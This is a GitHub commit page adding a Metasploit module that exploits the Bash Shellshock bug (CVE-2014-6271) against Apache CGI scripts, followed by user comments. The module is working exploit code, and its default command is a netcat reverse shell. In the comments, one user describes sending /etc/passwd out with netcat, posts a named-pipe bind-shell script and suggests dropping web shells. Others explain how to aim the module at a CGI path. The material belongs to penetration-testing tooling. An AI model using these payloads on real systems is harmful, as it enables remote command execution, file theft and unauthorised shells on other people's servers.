-
Notifications
You must be signed in to change notification settings - Fork 14k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
49 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| ## | ||
| # This module requires Metasploit: http//metasploit.com/download | ||
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| require 'msf/core' | ||
|
|
||
| class Metasploit4 < Msf::Auxiliary | ||
|
|
||
| include Msf::Exploit::Remote::HttpClient | ||
| include Msf::Auxiliary::Scanner | ||
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection', | ||
| 'Description' => %q{ | ||
| This module exploits a code injection in specially crafted environment | ||
| variables in Bash, specifically targeting Apache mod_cgi scripts through | ||
| the HTTP_USER_AGENT variable. | ||
| }, | ||
| 'Author' => [ | ||
| 'Stephane Chazelas', # Vulnerability discovery | ||
| 'wvu' # Metasploit module | ||
| ], | ||
| 'References' => [ | ||
| ['CVE', '2014-6271'], | ||
| ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'], | ||
| ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] | ||
| ], | ||
| 'DisclosureDate' => 'Sep 24 2014', | ||
| 'License' => MSF_LICENSE | ||
| )) | ||
|
|
||
| register_options([ | ||
| OptString.new('TARGETURI', [true, 'Path to CGI script']), | ||
| OptString.new('CMD', [true, 'Command to run (absolute paths required)', | ||
| '/bin/nc -e /bin/sh 127.0.0.1 4444 &']) | ||
| ], self.class) | ||
| end | ||
|
|
||
| def run_host(ip) | ||
| send_request_cgi( | ||
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path), | ||
| 'agent' => "() { :;}; #{datastore['CMD']}" | ||
| ) | ||
| end | ||
|
|
||
| end |
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Awesome work!
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
absolutely terrifying!
amazing how quickly this has been created.
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great job! I tested this one and it works as expected. Works on Oracle Linux as well.
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
btw, the command I ran was /usr/bin/nc 10.0.0.22 < /etc/passwd
You could probably easily add an option to create a payload on the system (php or jsp shell) just using echo. Me thinks.
Oracle Linux's netcat doesn't allow -e so you have to use a complex script to get it to run.
!/bin/sh
myvar=
echo $RANDOMmycommand=
mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
then
echo “shell already started”
else
sh $mycommand &
fi
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
msf > search apache_mod
Matching Modules
Name Disclosure Date Rank Description
auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal Apache mod_isapi Dangling Pointer
auxiliary/shellshock/apache_mod_cgi_bash_env 2014-09-24 normal Apache mod_cgi Bash Environment Variable Code Injection
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache Module mod_rewrite LDAP Protocol Buffer Overflow
exploit/windows/http/apache_modjk_overflow 2007-03-02 great Apache mod_jk 1.2.20 Buffer Overflow
msf > use auxiliary/shellshock/apache_mod_cgi_bash_env
[-] Failed to load module: auxiliary/shellshock/apache_mod_cgi_bash_env
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@mbarrerax You'll need to update your MSF installation and specify the right path:
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is what I get when I run a msfupdate:
root@Kali:/# msfupdate
[]
[] Attempting to update the Metasploit Framework...
[*]
[] Checking for updates via the APT repository
[] Note: expect weekly(ish) updates using this method
[*] No updates available
msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
[-] Failed to load module: auxiliary/scanner/http/apache_mod_cgi_bash_env
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This was merged to master yesterday.
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
How to specify the TARGETURI option?
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
set TARGETURI [url without square brackets]
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Awesome work .
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi Team, I am trying this script against metasploitable2, i set the RHOSTS, RPORS, and TARGETURI, then i exploit, but it doesnt return anything that makes sense, am i doing something wrong ?
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@bhavinjbhatt For the module to succeed you must specify a CGI script which attempts to call Bash as TARGETURI
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@mbarrerax - i am new to metasploit and don't know how to do what you suggested, are you able to point me in the right direction ? Thanks in advance
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Put target uri as http://target-ip/cgi-bin/whatever.cgi or whatever.sh
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can I just copy and paste this to create a module for metasploit PRO?
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
ff5398bThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@ir8dog msfupdate